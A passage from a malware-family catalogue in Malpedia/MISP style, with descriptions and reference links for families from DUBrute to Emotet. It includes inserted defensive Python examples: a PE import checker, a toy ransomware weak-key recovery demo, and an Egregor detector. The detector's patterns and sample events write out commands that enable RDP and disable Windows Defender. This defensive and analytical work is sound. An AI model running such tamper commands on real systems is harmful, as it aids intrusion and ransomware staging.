https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

https://securelist.com/my-name-is-dtrack/93338/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage

https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

https://blog.macnica.net/blog/2020/11/dtrack.html

https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/

DUBrute

The tag is: misp-galaxy:malpedia="DUBrute"

DUBrute is also known as:

Table 3399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute

https://github.com/ch0sys/DUBrute

Dumador

The tag is: misp-galaxy:malpedia="Dumador"

Dumador is also known as:

Table 3401. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador

DUSTMAN

In 2019, multiple destructive attacks were observed targeting entities in the Middle East. Saudi Arabia's National Cyber Security Centre (NCSC), part of the National Cybersecurity Authority (NCA), detected a new malware that was detonated on December 29, 2019, and named it "DUSTMAN" after a filename and a string embedded in the malware. Based on evidence and artifacts recovered from machines in a victim's network that the malware did not wipe, NCSC assesses that the threat actor was under some urgency to execute the files on the date of the attack, given the multiple OPSEC failures observed on the infected network. DUSTMAN can be considered a new variant of the ZeroCleare wiper, which was publicly reported in December 2019.

The tag is: misp-galaxy:malpedia="DUSTMAN"

DUSTMAN is also known as:

Table 3403. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman

https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://twitter.com/Irfan_Asrar/status/1213544175355908096

https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report

DynamicStealer

Dynamic Stealer is a C# project published on GitHub by L1ghtN4n. It collects passwords and exfiltrates them via Telegram. According to Cyble, Eternity Stealer reuses code from this project, and Jester Stealer may be a rebranding of it.

The tag is: misp-galaxy:malpedia="DynamicStealer"

DynamicStealer is also known as:

Table 3406. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer

https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/

EagerBee

According to Elastic, EagerBee loads additional capabilities from PE files downloaded from its C2 server. Its implementation and coding practices suggest the author relied on basic techniques rather than advanced tradecraft. During their research, Elastic identified string formatting and underlying behaviour consistent with previous research attributed to the Chinese-speaking threat actor referred to as LuckyMouse (APT27, Emissary Panda).

The tag is: misp-galaxy:malpedia="EagerBee"

EagerBee is also known as:

Table 3408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

EagleMonitorRAT

This C# RAT is derived from HorusEyesRat. It was modified by "Arsium" and published on GitHub together with a client builder. GitHub source: https://github.com/arsium/EagleMonitorRAT

The tag is: misp-galaxy:malpedia="EagleMonitorRAT"

EagleMonitorRAT is also known as:

Table 3409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eagle_monitor_rat

https://blog.cyble.com/2022/04/18/under-the-lens-eagle-monitor-rat/

EASYNIGHT

FireEye describes EASYNIGHT as a loader observed with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often serves as a persistence mechanism via DLL search-order hijacking.

Examples include a patched bcrypt.dll with no modification other than an additional import entry, in the observed case "printwin.dll!gzwrite64", which also breaks the file's Authenticode signature.
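
A structural check for the pattern just described, as an added example that is not part of the page or of FireEye's research: a patched copy of a signed system DLL that suddenly imports from a DLL it never used to need. The block builds two tiny PE32+ images in memory (one clean, one carrying the extra `printwin.dll!gzwrite64` entry), walks their import directories with a minimal parser, and reports every import whose DLL is not on an expected-import baseline. The baseline set and the builder's import lists are assumptions for the demo, not the real bcrypt.dll import table; in production, a failing Authenticode signature on a `System32` DLL is the cheaper first tell, and this check explains what was patched.

```python
import struct

SEC_RVA, SEC_OFF = 0x1000, 0x400        # the single section's RVA and file offset


def build_pe(imports):
    """Build a minimal PE32+ image whose only section holds an import table.
    imports: list of (dll_name, [function_name, ...]). Constructed test input."""
    desc_size = 20 * (len(imports) + 1)  # IMAGE_IMPORT_DESCRIPTOR array + null terminator
    blob = bytearray(desc_size)
    descs = []
    for dll, funcs in imports:
        name_rva = SEC_RVA + len(blob)
        blob += dll.encode() + b"\x00"
        by_name = []
        for func in funcs:                # IMAGE_IMPORT_BY_NAME: WORD hint + NUL-terminated name
            blob += b"\x00" * (len(blob) % 2)
            by_name.append(SEC_RVA + len(blob))
            blob += struct.pack("<H", 0) + func.encode() + b"\x00"
        blob += b"\x00" * (-len(blob) % 8)
        thunks = b"".join(struct.pack("<Q", r) for r in by_name) + struct.pack("<Q", 0)
        ilt_rva = SEC_RVA + len(blob)     # import lookup table
        blob += thunks
        iat_rva = SEC_RVA + len(blob)     # import address table (identical on disk)
        blob += thunks
        descs.append(struct.pack("<IIIII", ilt_rva, 0, 0, name_rva, iat_rva))
    blob[:desc_size] = b"".join(descs) + bytes(20)

    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x80) + bytes(0x40)    # e_lfanew = 0x80
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # x64, 1 section, DLL
    opt = struct.pack("<H", 0x20B) + bytes(110)                         # PE32+ magic; rest unused
    dirs = [(0, 0)] * 16
    dirs[1] = (SEC_RVA, desc_size)                                      # IMAGE_DIRECTORY_ENTRY_IMPORT
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".idata", len(blob), SEC_RVA, len(blob), SEC_OFF,
                      0, 0, 0, 0, 0x40000040)
    pe = dos + b"PE\x00\x00" + file_hdr + opt + sec
    return pe + bytes(SEC_OFF - len(pe)) + bytes(blob)


def _cstr(pe, off):
    return pe[off:pe.index(b"\x00", off)].decode("ascii", "replace")


def parse_imports(pe):
    """Walk the import directory of a PE32/PE32+ image; return {dll: [func, ...]}."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    pe64 = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    imp_rva = struct.unpack_from("<I", pe, opt + (112 if pe64 else 96) + 8)[0]
    if imp_rva == 0:
        return {}
    # (VirtualAddress, SizeOfRawData, PointerToRawData) of each section header
    sections = [struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12) for i in range(nsec)]

    def rva_to_off(rva):
        for va, raw_size, raw_ptr in sections:
            if va <= rva < va + raw_size:
                return rva - va + raw_ptr
        raise ValueError(f"RVA {rva:#x} outside any section")

    width, fmt, ord_flag = (8, "<Q", 1 << 63) if pe64 else (4, "<I", 1 << 31)
    result, off = {}, rva_to_off(imp_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", pe, off)
        if name_rva == 0:                 # null descriptor terminates the array
            break
        funcs, thunk = [], rva_to_off(oft or ft)
        while (entry := struct.unpack_from(fmt, pe, thunk)[0]) != 0:
            funcs.append(f"#{entry & 0xFFFF}" if entry & ord_flag
                         else _cstr(pe, rva_to_off(entry) + 2))   # skip the 2-byte hint
            thunk += width
        result[_cstr(pe, rva_to_off(name_rva))] = funcs
        off += 20
    return result


def unexpected_imports(pe, expected_dlls):
    """'dll!func' for every import whose DLL is not on the module's baseline."""
    expected = {d.lower() for d in expected_dlls}
    return [f"{dll}!{f}" for dll, funcs in parse_imports(pe).items()
            if dll.lower() not in expected for f in funcs]


# Assumed baseline for the demo; the real bcrypt.dll imports a longer list.
BCRYPT_BASELINE = {"ntdll.dll", "kernel32.dll", "msvcrt.dll"}
CLEAN = build_pe([("ntdll.dll", ["RtlInitUnicodeString"]), ("msvcrt.dll", ["memcpy"])])
PATCHED = build_pe([("ntdll.dll", ["RtlInitUnicodeString"]), ("msvcrt.dll", ["memcpy"]),
                    ("printwin.dll", ["gzwrite64"])])   # the extra entry reported for EASYNIGHT

if __name__ == "__main__":
    print(parse_imports(PATCHED))
    print(unexpected_imports(PATCHED, BCRYPT_BASELINE))
```

The parser deliberately resolves RVAs through the section table rather than assuming a flat mapping, because a hijack-patched DLL keeps its original sections and the added descriptor can live anywhere the patcher found room; comparing against a baseline taken from a known-good copy of the same DLL version keeps the rule from firing on legitimate servicing updates.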

The tag is: misp-galaxy:malpedia="EASYNIGHT"

EASYNIGHT is also known as:

Table 3410. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight

https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://content.fireeye.com/api/pdfproxy?id=86840

Easy Stealer

Easy Stealer is an information stealer written in Go that was under active development when analysed. It has been sold on the underground market since July 2023, advertising capabilities such as targeting cryptocurrency wallets and passwords; VirusTotal data suggests developer test samples were uploaded in June 2023. The stealer's panel is installed on the buyer's own infrastructure, giving them exclusive control. The stated prices are $35 for 7 days, $115 for 30 days, and $250 for 90 days. Given its user-friendly panel, low price, and capabilities comparable to other information stealers, Easy Stealer is likely to see increasing distribution among cyber criminals as development continues.

The tag is: misp-galaxy:malpedia="Easy Stealer"

Easy Stealer is also known as:

Table 3411. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.easystealer

https://www.bridewell.com/insights/blogs/detail/uncovering-the-easy-stealer-infostealer

EDA2

EDA2 is a successor of HiddenTear. Like HiddenTear, it was developed as an open-source project by a security researcher and published on GitHub. It was meant as "educational ransomware" and deliberately had flaws in the encryption process that allow decryption of ransomed files.

This backfired, when threat actors began to modify HiddenTear and EDA2 source code. Some modifications introduced bugs where encrypted files were destroyed, others fixed the encryption flaws and made decryption without a key impossible.
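
Why a deliberately weakened encryption scheme lets victims decrypt without a key, as an added example that is neither the page's text nor code from the HiddenTear or EDA2 repositories: the page does not state which flaw the educational projects shipped, so this illustrates one common class, a per-file key derived from a low-entropy seed (here the Unix time at which encryption ran), which a responder can brute-force over the incident window with a known-plaintext check on a file header. The cipher is a toy keystream built from SHA-256 so the block runs offline; it stands in for AES and is not the original projects' construction. The victim file and timestamp are constructed.

```python
import hashlib
import struct


def derive_key(seed):
    """Flawed KDF: the entire key space is a 32-bit seed (assumed flaw class)."""
    return hashlib.sha256(b"eda2-demo" + struct.pack("<I", seed)).digest()


def keystream_xor(key, data):
    """Toy stream cipher: XOR with SHA-256(key || counter) blocks. Symmetric."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + struct.pack("<Q", i // 32)).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def encrypt_file(plaintext, encrypted_at):
    """What the weakened ransomware does: the file key comes from the clock."""
    return keystream_xor(derive_key(encrypted_at), plaintext)


def recover_key(ciphertext, known_prefix, window_start, window_end):
    """Defender side: try every seed in the incident window and accept the first
    key whose decryption reproduces a known header (for example a file magic)."""
    for seed in range(window_start, window_end + 1):
        key = derive_key(seed)
        if keystream_xor(key, ciphertext[:len(known_prefix)]) == known_prefix:
            return seed, key
    return None


# Constructed victim file: a PDF header plus a few body bytes.
PLAINTEXT = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
ENCRYPTED_AT = 1_600_000_000          # assumed encryption time (seconds since epoch)
CIPHERTEXT = encrypt_file(PLAINTEXT, ENCRYPTED_AT)


def demo():
    """Responders usually know the encryption time to within hours (first ransom
    note, failed backup job, alert timestamps); that bounds the search."""
    hit = recover_key(CIPHERTEXT, b"%PDF-", ENCRYPTED_AT - 6 * 3600, ENCRYPTED_AT + 6 * 3600)
    seed, key = hit
    return seed, keystream_xor(key, CIPHERTEXT)


if __name__ == "__main__":
    seed, plain = demo()
    print(seed, plain[:20])
```

The "fix" the paragraph above refers to, the one that made decryption without a key impossible, is the opposite design: a per-file key from a cryptographically secure random source, wrapped with an attacker-held public key, so that no brute-forceable seed exists for a responder to search.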

The tag is: misp-galaxy:malpedia="EDA2"

EDA2 is also known as:

Table 3412. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom

https://github.com/utkusen/eda2

https://www.bleepingcomputer.com/news/security/hidden-tear-ransomware-developer-blackmailed-by-malware-developers-using-his-code/

https://utkusen.com/blog/im-sorry-for-hidden-tear-eda2

https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/

https://twitter.com/JaromirHorejsi/status/815861135882780673

Egregor

According to Heimdal, an Egregor infection begins with a loader; the malware then enables Remote Desktop Protocol (RDP) in the victim's firewall, moves laterally inside the victim's network, identifies and disables any antivirus software it can find, encrypts the data, and drops a ransom note named "RECOVER-FILES.txt" in every compromised folder.
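
Detection logic for the stages Heimdal describes, as an added example that is not part of the page or of Heimdal's analysis: it classifies endpoint events into three stages (RDP enabled in the host firewall, security software tampered with, the RECOVER-FILES.txt note dropped) and correlates them per host, so that the first two stages raise a precursor alert before encryption starts. Only the ransom-note name comes from the page; the command lines matched (the two common ways to turn RDP on in Windows), the illustrative security-product names, and the event records are assumptions for the demo.

```python
import re
from collections import defaultdict

# Stage 1: common ways to enable RDP on Windows (assumed, not Egregor-specific).
RDP_ENABLE = [
    re.compile(r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop"'
               r"\s+new\s+enable=yes", re.I),
    re.compile(r"reg(?:\.exe)?\s+add\s+.*Terminal Server.*fDenyTSConnections.*/d\s+0\b", re.I),
]
# Stage 2: service/process tampering aimed at security products (illustrative names).
TAMPER = re.compile(r"\b(?:taskkill|sc(?:\.exe)?\s+(?:stop|config)|net(?:\.exe)?\s+stop)\b", re.I)
SECURITY_NAMES = ("msmpeng", "windefend", "sense", "mbamservice", "ekrn")
# Stage 3: the ransom note name reported for Egregor.
NOTE_NAME = "recover-files.txt"


def classify(ev):
    """Map one endpoint event to a stage name, or None if it is not interesting."""
    if ev["type"] == "process":
        cmd = ev["cmd"]
        if any(p.search(cmd) for p in RDP_ENABLE):
            return "rdp_enabled"
        if TAMPER.search(cmd) and any(n in cmd.lower() for n in SECURITY_NAMES):
            return "security_disabled"
    elif ev["type"] == "file" and ev["path"].lower().endswith("\\" + NOTE_NAME):
        return "ransom_note"
    return None


def triage(events):
    """Per host: ('ransomware', stages) once the note drop is seen, ('precursor',
    stages) when only RDP enabling or security tampering has been seen so far.
    Stages are listed in first-seen order after sorting by timestamp."""
    stages = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage and stage not in stages[ev["host"]]:
            stages[ev["host"]].append(stage)
    return {host: ("ransomware" if "ransom_note" in seen else "precursor", seen)
            for host, seen in stages.items() if seen}


# Constructed telemetry (process creations and file writes), not real logs.
EVENTS = [
    {"ts": "2020-11-02T09:58:10Z", "host": "FS01", "type": "process",
     "cmd": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"ts": "2020-11-02T10:03:41Z", "host": "FS01", "type": "process",
     "cmd": "sc.exe config WinDefend start= disabled"},
    {"ts": "2020-11-02T10:20:05Z", "host": "FS01", "type": "file",
     "path": r"C:\Shares\Finance\RECOVER-FILES.txt"},
    {"ts": "2020-11-02T10:01:00Z", "host": "WS07", "type": "process",
     "cmd": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
            r" /v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"ts": "2020-11-02T10:05:00Z", "host": "WS12", "type": "process",
     "cmd": "taskkill /f /im notepad.exe"},        # benign: not a security product
    {"ts": "2020-11-02T10:06:00Z", "host": "WS12", "type": "file",
     "path": r"C:\Users\bob\Documents\notes.txt"},
]

if __name__ == "__main__":
    for host, (verdict, seen) in triage(EVENTS).items():
        print(host, verdict, seen)
```

The correlation is what makes the individual matches useful: a lone `sc config ... disabled` or firewall rule change is noisy on its own, but on a host where the ransom note never appears it still surfaces as a precursor, which is the window in which isolating the host prevents the encryption stage rather than merely documenting it.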

The tag is: misp-galaxy:malpedia="Egregor"

Egregor is also known as:

Table 3413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf

https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/

https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://twitter.com/redcanary/status/1334224861628039169

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/

https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/

https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html

https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf

https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/

https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html

https://www.group-ib.com/blog/egregor

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/

https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf

https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/

https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/

https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/

https://www.intrinsec.com/egregor-prolock/

https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/

https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html

ELECTRICFISH

The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.

The tag is: misp-galaxy:malpedia="ELECTRICFISH"

ELECTRICFISH is also known as:

Table 3416. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.us-cert.gov/ncas/analysis-reports/AR19-129A

ElectricPowder

The tag is: misp-galaxy:malpedia="ElectricPowder"

ElectricPowder is also known as:

Table 3417. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder

https://www.clearskysec.com/iec/

Elirks

Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Most attacks using Elirks occur in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor. Multiple Elirks variants have been using Japanese blog services for the last couple of years.

The tag is: misp-galaxy:malpedia="Elirks"

Elirks is also known as:

Table 3418. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks

https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/

https://unit42.paloaltonetworks.com/unit42-tracking-elirks-variants-in-japan-similarities-to-previous-attacks/

ElizaRAT

The tag is: misp-galaxy:malpedia="ElizaRAT"

ElizaRAT is also known as:

Table 3420. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eliza_rat

https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal

El Machete APT Backdoor Dropper

This dropper masquerades as Adobe software, titled Adobe.msi. It is used to execute the Python-written backdoor used by this threat actor.

The tag is: misp-galaxy:malpedia="El Machete APT Backdoor Dropper"

El Machete APT Backdoor Dropper is also known as:

Table 3421. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.elmachete_dropper_2022

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

ELMER

ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.

The tag is: misp-galaxy:malpedia="ELMER"

ELMER is also known as:

  • Elmost

Table 3422. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer

https://attack.mitre.org/software/S0064

https://www.symantec.com/security-center/writeup/2015-122210-5724-99

https://attack.mitre.org/groups/G0023

https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Emotet

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it opened up another business channel by selling its infrastructure to deliver additional malicious software. Malware analysts have classified it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.

The tag is: misp-galaxy:malpedia="Emotet"

Emotet is also known as:

  • Geodo

  • Heodo

Table 3425. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/

https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://unit42.paloaltonetworks.com/domain-parking/

https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure

https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/

https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/

https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html

https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html

https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/

https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/

https://twitter.com/raashidbhatt/status/1237853549200936960

https://experience.mandiant.com/trending-evil-2/p/1

https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf

https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/

https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates

https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://cyber.wtf/2021/11/15/guess-whos-back/

https://unit42.paloaltonetworks.com/emotet-command-and-control/

https://isc.sans.edu/diary/rss/27036

https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://github.com/cecio/EMOTET-2020-Reversing

https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/

https://www.atomicmatryoshka.com/post/malware-headliners-emotet

https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video

https://www.hornetsecurity.com/en/threat-research/comeback-emotet/

https://threatpost.com/emotet-spreading-malicious-excel-files/178444/
